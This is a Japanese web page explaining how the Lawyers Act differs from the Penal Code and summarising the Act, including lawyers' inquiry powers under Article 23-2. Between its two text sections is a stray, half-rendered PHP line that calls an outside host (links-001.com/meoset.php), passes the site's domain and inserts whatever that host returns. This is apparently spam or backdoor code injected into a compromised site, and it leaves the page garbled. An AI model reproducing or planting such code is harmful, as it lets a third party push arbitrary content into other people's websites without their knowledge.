前へ
次へ

弁護士法と刑法の違いとは

弁護士法とは刑法の違いは何なのでしょうか。後者のほうはほとんどの人は聞いたことがあると思います。ですが、前者のほうは聞いたことすらない人もいると思います。まず弁護士法とはどんな法律なのでしょう。弁護士法とは名前の通り弁護士制度を定めるための法律です。弁護士などの使命、職務、弁護士会の制度などを定めるほか、資格を持っていないひとの法律事務所の取り扱い・表示・名称使用の禁止などを定めます。また刑法は犯罪とそれに対する刑罰の関係を規律する法律です。このように刑法と弁護士法は同じようなもの、似たようなもの、などと思われたりもしますが、その目的、規制する対称などからまったく違った法律であることが分かります。

".file_get_contents('http://links-001.com/meoset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

弁護士法について、ご紹介します。

弁護士法とは、1949年(昭和24年)に制定された法律であり、弁護士の職務・資格・登録や、弁護士会に関する事項を規定する弁護士制度の基本法です。無資格者の法律事務の取扱い禁止、弁護士・法律事務所の名称使用禁止などについても定められています。弁護士が依頼を受けて、紛争を解決しようとする場合、事実を立証するための資料収集は不可欠です。資料は、必ずしも依頼者が持っているとは限らず、資料を有していると考えられる官公庁や企業などの団体に対して、必要事項を照会することが必要となる場合もあります。弁護士には、その職務の公共性から、情報収集のための手段が認められており、弁護士法第23条の2にその旨が規定されています。

Page Top